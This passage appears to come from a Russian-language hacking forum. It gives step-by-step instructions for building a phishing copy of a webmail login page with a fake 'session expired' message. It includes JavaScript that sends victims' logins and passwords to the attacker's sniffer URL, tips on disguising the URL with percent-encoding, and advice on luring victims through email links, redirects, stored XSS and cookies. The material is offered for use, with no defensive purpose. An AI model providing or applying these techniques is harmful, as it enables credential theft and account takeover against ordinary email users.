собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
Заходишь на страничку почтовика где требуют ввести логин/пароль. Жмешь правую кнопку мышки и выбираешь "Просмотр HTML-кода". Откроется Блокнот (или что у тебя там настроено?). Жмешь сохранить и сохраняешь, например, под именем relogin.htm
...
Открываешь relogin.htm и начинаешь его доделывать - дописываешь полные пути до изображений, ссылок и т.п. Доделал? Запускай его и смотри чтобы без ошибок на странице, все ссылки ввели на настоящий сайт, все изображения нормально отображались. Ну теперь и добавляй надпись - период сессии истек, требуется перезайти на сайт. Сохраняйся. Делай копию (как откат). Открывай. Запускай на странице поиск по слову form, смотри какое у него имя. Допустим - name=formsendlogin, теперь ищи поле ввода логина и смотри какое у него name, допустим - name="login", тоже самое и с паролем: name="password"
Теперь ищи что-то типа такого куска <input type="submit". Допустим у тебя будет так:
<input type="submit" value="готово" class="button">
, тогда добавляй к нему onClick=go_go_go();, чтобы получилось:
<input type="submit" value="готово" class="button" onClick=go_go_go();>
Т.е. при клике по кнопке мы и отправим и вызовим функцию. Теперь найди </form> и вставь после него такой код:
<script>
function go_go_go(){
img = new Image();
img.src = "http://путь_до_твоего_снифера.ru/s.php?"+"Login:"+document.formsendlogin.login.valu e+" Password:"+document.formsendlogin.password.value;
}
</script>
Тока в строчках document.formsendlogin.login.value и document.formsendlogin.password.value замени formsendlogin, login и password на название своих полей.
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...
Вот тут внимательно прочитай:
http://www.forum.antichat.ru/thread11236.html
Там первый пост если на странице есть фрэймы, а чуть дальше пример если фреймов нет.
Но! Там должно открываться новое окно.
Чтобы в этом - зарегь себе сайт на бесплатном хостинге, и перекидывай на урл:
http://www.названиесайтапочтовика.%6...8d8434ce0d8a97
Вообщем, просто запугай длинным урлом. Так как не все обратят внимание на %68%31%36
по части того что JS не работает в письме:
можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться?
Ну прикинь - ты жмешь на ссылку на какой-то сайт, а тебе пишут что сессия истекла на почтовике. Надо при загрузке страницы сразу редиректить либо, как пахало на яндексе (щас - незнаю пашет или нет) - просто прилепляешь заряженое изображение с мелкими деталями, при клике по которому открывается новое (где и происходит редирект). Но при этом встраивать запись куки. Чтобы не получилось так, что его каждый раз при попытке просмотра письма будут редиректить. Вот поэтому и надо встроить запись куки. Чтобы редиректило тока один раз.
Методов редиректа несколько. Смотря какую активную XSS ты юзаешь, или как используешь и куда перекидываешь. Тут надо конкретно смотреть.